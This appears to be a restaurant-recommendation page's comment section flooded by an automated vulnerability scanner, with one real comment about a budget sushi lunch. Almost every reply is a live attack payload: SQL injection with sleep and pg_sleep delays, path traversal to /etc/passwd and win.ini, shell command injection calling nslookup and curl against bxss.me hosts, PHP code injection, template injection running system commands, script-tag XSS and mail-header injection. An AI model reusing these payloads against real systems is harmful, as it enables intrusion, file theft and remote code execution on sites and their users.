unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: thetokyogourmet
WEB-INF/web.xml
re: thetokyogourmet
WEB-INF\web.xml
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
-1 OR 2+680-680-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 3+680-680-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 2+631-631-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+631-631-1=0+0+0+1
re: thetokyogourmet
-1' OR 2+979-979-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 3+979-979-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 2+840-840-1=0+0+0+1 or 'vOs46dow'='
re: thetokyogourmet
-1' OR 3+840-840-1=0+0+0+1 or 'vOs46dow'='
re: thetokyogourmet
-1" OR 2+420-420-1=0+0+0+1 --
re: thetokyogourmet
-1" OR 3+420-420-1=0+0+0+1 --
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
4MB2hgCD'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 751=(SELECT 751 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 36=(SELECT 36 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 711=(SELECT 711 FROM PG_SLEEP(15))--
re: thetokyogourmet
EfoOuYeT' OR 899=(SELECT 899 FROM PG_SLEEP(15))--
re: thetokyogourmet
xCjGctvE') OR 725=(SELECT 725 FROM PG_SLEEP(15))--
re: thetokyogourmet
Ji73ObWR')) OR 478=(SELECT 478 FROM PG_SLEEP(15))--
re: thetokyogourmet
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@UbwoJ
re: thetokyogourmet
1CLVR9E9V0
re: thetokyogourmet
response.write(9960322*9116785)
re: thetokyogourmet
'+response.write(9960322*9116785)+'
re: thetokyogourmet
"+response.write(9960322*9116785)+"
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
${9999948+10000466}
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../
re: thetokyogourmet
)
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
redirtest.acx
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: thetokyogourmet
echo xvewis$()\ qwwmta\nz^xyu||a #' &echo xvewis$()\ qwwmta\nz^xyu||a #|" &echo xvewis$()\ qwwmta\nz^xyu||a #
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: thetokyogourmet
&echo dxdbvh$()\ zmoajb\nz^xyu||a #' &echo dxdbvh$()\ zmoajb\nz^xyu||a #|" &echo dxdbvh$()\ zmoajb\nz^xyu||a #
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
'.gethostbyname(lc('hitjr'.'lkismggv7e7c9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(90).chr(121).chr(65).'
re: thetokyogourmet
|echo tkqcln$()\ mlvilj\nz^xyu||a #' |echo tkqcln$()\ mlvilj\nz^xyu||a #|" |echo tkqcln$()\ mlvilj\nz^xyu||a #
re: thetokyogourmet
../../../../../../../../../../../../../../etc/shells
re: thetokyogourmet
".gethostbyname(lc("hitwj"."wuldtvrr5cdeb.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(70).chr(113).chr(68)."
re: thetokyogourmet
expr 9000877123 - 976922
re: thetokyogourmet
gethostbyname(lc('hithr'.'qkdnpoqy85012.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(88).chr(103).chr(72)
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
(nslookup -q=cname hitxveumpyqxc15485.bxss.me||curl hitxveumpyqxc15485.bxss.me))
re: thetokyogourmet
bxss.me
re: thetokyogourmet
$(nslookup -q=cname hitalostdrywhbd705.bxss.me||curl hitalostdrywhbd705.bxss.me)
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
&nslookup -q=cname hitqbodihdvgj13db3.bxss.me&'\"`0&nslookup -q=cname hitqbodihdvgj13db3.bxss.me&`'
re: thetokyogourmet
http://bxss.me/t/fit.txt?.jpg
re: thetokyogourmet
&(nslookup -q=cname hitnztiysdvdf90511.bxss.me||curl hitnztiysdvdf90511.bxss.me)&'\"`0&(nslookup -q=cname hitnztiysdvdf90511.bxss.me||curl hitnztiysdvdf90511.bxss.me)&`'
re: thetokyogourmet
ctime
sleep
p0
(I30
tp1
Rp2
.
re: thetokyogourmet
|(nslookup -q=cname hitxtqpdtqvcc6de79.bxss.me||curl hitxtqpdtqvcc6de79.bxss.me)
re: thetokyogourmet
`(nslookup -q=cname hitqgsbjvlivae62a0.bxss.me||curl hitqgsbjvlivae62a0.bxss.me)`
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
;(nslookup -q=cname hitikskopndxbc8f9d.bxss.me||curl hitikskopndxbc8f9d.bxss.me)|(nslookup -q=cname hitikskopndxbc8f9d.bxss.me||curl hitikskopndxbc8f9d.bxss.me)&(nslookup -q=cname hitikskopndxbc8f9d.bxss.me||curl hitikskopndxbc8f9d.bxss.me)
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
|(nslookup${IFS}-q${IFS}cname${IFS}hitmnsgvcvnhyf791d.bxss.me||curl${IFS}hitmnsgvcvnhyf791d.bxss.me)
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
&(nslookup${IFS}-q${IFS}cname${IFS}hityofbyufqnbc7b0a.bxss.me||curl${IFS}hityofbyufqnbc7b0a.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hityofbyufqnbc7b0a.bxss.me||curl${IFS}hityofbyufqnbc7b0a.bxss.me)&`'
re: thetokyogourmet
'"()
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
'&&sleep(27*1000)*okleyx&&'
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
"&&sleep(27*1000)*xxgcws&&"
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
'||sleep(27*1000)*sxwfij||'
re: thetokyogourmet
"||sleep(27*1000)*mjpygy||"
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(97).concat(66).concat(118).concat(75)+(require"socket"
Socket.gethostbyname("hitnl"+"txjuhyvt76957.bxss.me.")[3].to_s)+"
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(100).concat(89).concat(99).concat(84)+(require'socket'
Socket.gethostbyname('hitzv'+'wspeuqnt19a13.bxss.me.')[3].to_s)+'
re: thetokyogourmet
replies
re: thetokyogourmet
'A'.concat(70-3).concat(22*4).concat(115).concat(80).concat(102).concat(89)+(require'socket'
Socket.gethostbyname('hitjk'+'rlzqesub6675c.bxss.me.')[3].to_s)
re: thetokyogourmet
replies�
re: thetokyogourmet
replies/.
re: thetokyogourmet
'"
re: thetokyogourmet
<!--
re: thetokyogourmet
'"()&%<zzz><ScRiPt >yA3z(9886)</ScRiPt>
re: thetokyogourmet
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityenlloeqet53646.bxss.me")}}
re: thetokyogourmet
'"()&%<zzz><ScRiPt >yA3z(9941)</ScRiPt>
re: thetokyogourmet
9900952
re: thetokyogourmet
4I7XrTn0
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
-1 OR 5*5=25 --
re: thetokyogourmet
-1 OR 5*5=26 --
re: thetokyogourmet
-1 OR 5*5=25
re: thetokyogourmet
-1 OR 5*5=26
re: thetokyogourmet
*if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
-1 waitfor delay '0:0:15' --
re: thetokyogourmet
0MfwOTsw'; waitfor delay '0:0:15' --
re: thetokyogourmet
-1 OR 863=(SELECT 863 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1) OR 90=(SELECT 90 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 507=(SELECT 507 FROM PG_SLEEP(15))--
re: thetokyogourmet
SbrUntvm' OR 791=(SELECT 791 FROM PG_SLEEP(15))--
re: thetokyogourmet
fTHPmyi3') OR 673=(SELECT 673 FROM PG_SLEEP(15))--
re: thetokyogourmet
0CfWpcAg')) OR 856=(SELECT 856 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
'"
re: thetokyogourmet
@@IU6kn
re: thetokyogourmet
(select 198766*667891)
re: thetokyogourmet
(select 198766*667891 from DUAL)
Just went to Sushi Comari on this list, while it wasn't really my cup of tea. Superb CP, 8k Lunch for 13 nigiri. A good spot for travellers on a budget, who want a omakase fix.
re: Wanderlusting
1C7TIFqKEgO
re: Wanderlusting
%0abcc:074625.67-22090.67.c4d95.19990.2@bxss.me
re: Wanderlusting
response.write(9132895*9632606)
re: Wanderlusting
to@example.com>%0d%0abcc:074625.67-22091.67.c4d95.19990.2@bxss.me
re: Wanderlusting
'+response.write(9132895*9632606)+'
re: Wanderlusting
<esi:include src="http://bxss.me/rpb.png"/>
re: Wanderlusting
"+response.write(9132895*9632606)+"
re: Wanderlusting
${10000089+9999612}
re: Wanderlusting
../../../../../../../../../../../../../../etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../windows/win.ini
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../../proc/version
re: Wanderlusting
'.gethostbyname(lc('hitda'.'qicmqcym80ae1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(84).chr(116).chr(87).'
re: Wanderlusting
)
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Wanderlusting
".gethostbyname(lc("hitjg"."bcqrpqfi08b0d.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(66).chr(98).chr(65)."
re: Wanderlusting
!(()&&!|*|*|
re: Wanderlusting
../../../../../../../../../../etc/passwd%00.jpg
re: Wanderlusting
^(#$!@#$)(()))******
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Wanderlusting
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Wanderlusting
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Wanderlusting
echo qivmes$()\ fmnbxo\nz^xyu||a #' &echo qivmes$()\ fmnbxo\nz^xyu||a #|" &echo qivmes$()\ fmnbxo\nz^xyu||a #
re: Wanderlusting
/etc/passwd
re: Wanderlusting
&echo pgiyuj$()\ gracjl\nz^xyu||a #' &echo pgiyuj$()\ gracjl\nz^xyu||a #|" &echo pgiyuj$()\ gracjl\nz^xyu||a #
re: Wanderlusting
%2fetc%2fpasswd
re: Wanderlusting
HttP://bxss.me/t/xss.html?%00
re: Wanderlusting
|echo yjivhn$()\ potpyj\nz^xyu||a #' |echo yjivhn$()\ potpyj\nz^xyu||a #|" |echo yjivhn$()\ potpyj\nz^xyu||a #
re: Wanderlusting
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Wanderlusting
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Wanderlusting
bxss.me/t/xss.html?%00
re: Wanderlusting
"+"A".concat(70-3).concat(22*4).concat(97).concat(77).concat(107).concat(80)+(require"socket"
Socket.gethostbyname("hityj"+"smwyylcwac5f1.bxss.me.")[3].to_s)+"
re: Wanderlusting
(nslookup hitubvlcojbwiec29f.bxss.me||perl -e "gethostbyname('hitubvlcojbwiec29f.bxss.me')")
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Wanderlusting
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Wanderlusting
'+'A'.concat(70-3).concat(22*4).concat(119).concat(65).concat(118).concat(75)+(require'socket'
Socket.gethostbyname('hitqt'+'vxzaobuc4292a.bxss.me.')[3].to_s)+'
re: Wanderlusting
$(nslookup hitbkmkozwgeqc6c21.bxss.me||perl -e "gethostbyname('hitbkmkozwgeqc6c21.bxss.me')")
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Wanderlusting
Http://bxss.me/t/fit.txt
re: Wanderlusting
&nslookup hitnzbkbwhocj90313.bxss.me&'\"`0&nslookup hitnzbkbwhocj90313.bxss.me&`'
re: Wanderlusting
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Wanderlusting
http://bxss.me/t/fit.txt%3F.jpg
re: Wanderlusting
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Wanderlusting
&(nslookup hitzadbucukfqe10de.bxss.me||perl -e "gethostbyname('hitzadbucukfqe10de.bxss.me')")&'\"`0&(nslookup hitzadbucukfqe10de.bxss.me||perl -e "gethostbyname('hitzadbucukfqe10de.bxss.me')")&`'
re: Wanderlusting
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Wanderlusting
/etc/shells
re: Wanderlusting
|(nslookup hitmwkuftkssba4d7b.bxss.me||perl -e "gethostbyname('hitmwkuftkssba4d7b.bxss.me')")
re: Wanderlusting
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Wanderlusting
c:/windows/win.ini
re: Wanderlusting
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Wanderlusting
'"
re: Wanderlusting
`(nslookup hithywiafcsbf023a0.bxss.me||perl -e "gethostbyname('hithywiafcsbf023a0.bxss.me')")`
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
bxss.me
re: Wanderlusting
';print(md5(31337));$a='
re: Wanderlusting
<!--
re: Wanderlusting
;(nslookup hitazrmkydaiac4dea.bxss.me||perl -e "gethostbyname('hitazrmkydaiac4dea.bxss.me')")|(nslookup hitazrmkydaiac4dea.bxss.me||perl -e "gethostbyname('hitazrmkydaiac4dea.bxss.me')")&(nslookup hitazrmkydaiac4dea.bxss.me||perl -e "gethostbyname('hitazrmkydaiac4dea.bxss.me')")
re: Wanderlusting
/\../\../\../\../\../\../\../etc/passwd
re: Wanderlusting
";print(md5(31337));$a="
re: Wanderlusting
/WEB-INF/web.xml
re: Wanderlusting
${@print(md5(31337))}
re: Wanderlusting
C:\WINDOWS\system32\drivers\etc\hosts
re: Wanderlusting
${@print(md5(31337))}\
re: Wanderlusting
../../../../../../../../../../windows/win.ini%00.jpg
re: Wanderlusting
'.print(md5(31337)).'
re: Wanderlusting
/../../../../../../../../../../boot.ini
re: Wanderlusting
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Wanderlusting
..\..\..\..\..\..\..\..\windows\win.ini
re: Wanderlusting
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Wanderlusting
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Wanderlusting
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\